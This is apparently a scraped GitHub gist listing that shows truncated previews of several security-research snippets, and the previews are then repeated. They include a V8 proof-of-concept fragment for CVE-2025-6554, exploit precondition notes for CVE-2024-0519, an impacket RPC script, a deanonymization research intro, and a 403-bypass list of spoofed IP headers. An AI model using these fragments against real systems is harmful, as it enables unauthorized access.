Ryota Sakai famasoon

## chrome-bug-commit-tracker.py
#!/usr/bin/env python3
import sys
import json
import requests
import feedparser
import re

BUG_ID = sys.argv[1] if len(sys.argv) > 1 else None
if not BUG_ID or not BUG_ID.isdigit():
    print("Usage: python3 chrome-bug-commit-tracker.py <bug_id>")

## python_embed.ps1
# PowerShell script to download and install Python embeddable package with pip
# This script replicates the functionality of the download_extract_python() function

param(
    [string]$PythonVersion = "3.10.11",
    [string]$TargetDir = "C:\Users\Public\python-3.10.11",
    [string]$PythonUrl = "https://www.python.org/ftp/python/3.10.11/python-3.10.11-embed-amd64.zip",
    [string]$PipUrl = "https://bootstrap.pypa.io/get-pip.py"
)

## CVE-2025-6554 POC.js
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}

## SuperReturn.c
/// Return, but across multiple frames.
///
/// This function unwinds the given number of frames, then sets the return value provided, emulating as if this number
/// of functions returned, with the last one returning the value provided in RetVal. Can be used to hook a callee when
/// you don't have a convenient way to hook it directly and actually just want to stub it out with a return value.
///
/// @param FramesToSkip The number of frames to skip, starting from the current frame.
/// @param RetVal The value to return from the last frame.
/// @param Context Context to start from, in case you want to SuperReturn from somewhere deeper.
DECLSPEC_NOINLINE void SuperReturn(

## lsarlookupsids3_aes.py
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys

# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD

## research.md

      
              1 file
            
          
              61 forks
            
          
                233 comments
              
            
              870 stars
            
          
                hackermondev
                / research.md
            
            
              Last active
              July 14, 2025 06:34
            
              
                Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform
              
          
    hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.
3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.
I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:
Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

  
## CVE-2024-0519 notes
//Preconditons
//----------------------
// (1) The receiver must be a regular object and the key a unique name.
//        this excludes special objects such as globalThis, wasm object, etc
// (2) The property to be deleted must be the last property.
// (3) The property to be deleted must be deletable.
//        this excludes non-configurable properties. So no frozen or sealed objects.
// (4) The map must have a back pointer.
//        this excludes prototype maps
// (5) The last transition must have been caused by adding a property

## GetTracelogProviderSecurity.ps1
### USAGE:
###
### GetTracelogProviderSecurity.ps1 (to get all provider info)
###
### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf
### (to get the info for 1 provider guid)
##
#
# Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf
# Control Flags: 45076

## pdf_to_md.py
import os
import base64

from concurrent.futures import ThreadPoolExecutor, as_completed

import openai

from pdf2image import convert_from_path
from PIL import Image

## 403-Bypass-Headers-List.txt
Allow: CONNECT
Allow: GET
Allow: HEAD
Allow: POST
Allow: TRACE
Client-IP: 0
Client-IP: 0177.0000.0000.0001
Client-IP: 0x7F000001
Client-IP: 10.0.0.0
Client-IP: 10.0.0.1
	#!/usr/bin/env python3
	import sys
	import json
	import requests
	import feedparser
	import re

	BUG_ID = sys.argv[1] if len(sys.argv) > 1 else None
	if not BUG_ID or not BUG_ID.isdigit():
	print("Usage: python3 chrome-bug-commit-tracker.py <bug_id>")
	# PowerShell script to download and install Python embeddable package with pip
	# This script replicates the functionality of the download_extract_python() function

	param(
	[string]$PythonVersion = "3.10.11",
	[string]$TargetDir = "C:\Users\Public\python-3.10.11",
	[string]$PythonUrl = "https://www.python.org/ftp/python/3.10.11/python-3.10.11-embed-amd64.zip",
	[string]$PipUrl = "https://bootstrap.pypa.io/get-pip.py"
	)
	function leak_hole() {
	let x;
	delete x?.[y]?.a;
	return y;
	let y;
	}
	function pwn() {
	let hole = leak_hole();
	%DebugPrint(hole);
	}
	/// Return, but across multiple frames.
	///
	/// This function unwinds the given number of frames, then sets the return value provided, emulating as if this number
	/// of functions returned, with the last one returning the value provided in RetVal. Can be used to hook a callee when
	/// you don't have a convenient way to hook it directly and actually just want to stub it out with a return value.
	///
	/// @param FramesToSkip The number of frames to skip, starting from the current frame.
	/// @param RetVal The value to return from the last frame.
	/// @param Context Context to start from, in case you want to SuperReturn from somewhere deeper.
	DECLSPEC_NOINLINE void SuperReturn(
	from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
	from impacket.uuid import bin_to_uuidtup
	from binascii import unhexlify
	from random import randbytes
	import sys

	# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
	# Pure TCP RPC is used (ncacn_ip_tcp option)
	# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
	# Tested with impacket 0.12.0 on GOAD
	//Preconditons
	//----------------------
	// (1) The receiver must be a regular object and the key a unique name.
	// this excludes special objects such as globalThis, wasm object, etc
	// (2) The property to be deleted must be the last property.
	// (3) The property to be deleted must be deletable.
	// this excludes non-configurable properties. So no frozen or sealed objects.
	// (4) The map must have a back pointer.
	// this excludes prototype maps
	// (5) The last transition must have been caused by adding a property
	### USAGE:
	###
	### GetTracelogProviderSecurity.ps1 (to get all provider info)
	###
	### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf
	### (to get the info for 1 provider guid)
	##
	#
	# Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf
	# Control Flags: 45076
	import os
	import base64

	from concurrent.futures import ThreadPoolExecutor, as_completed

	import openai

	from pdf2image import convert_from_path
	from PIL import Image
	Allow: CONNECT
	Allow: GET
	Allow: HEAD
	Allow: POST
	Allow: TRACE
	Client-IP: 0
	Client-IP: 0177.0000.0000.0001
	Client-IP: 0x7F000001
	Client-IP: 10.0.0.0
	Client-IP: 10.0.0.1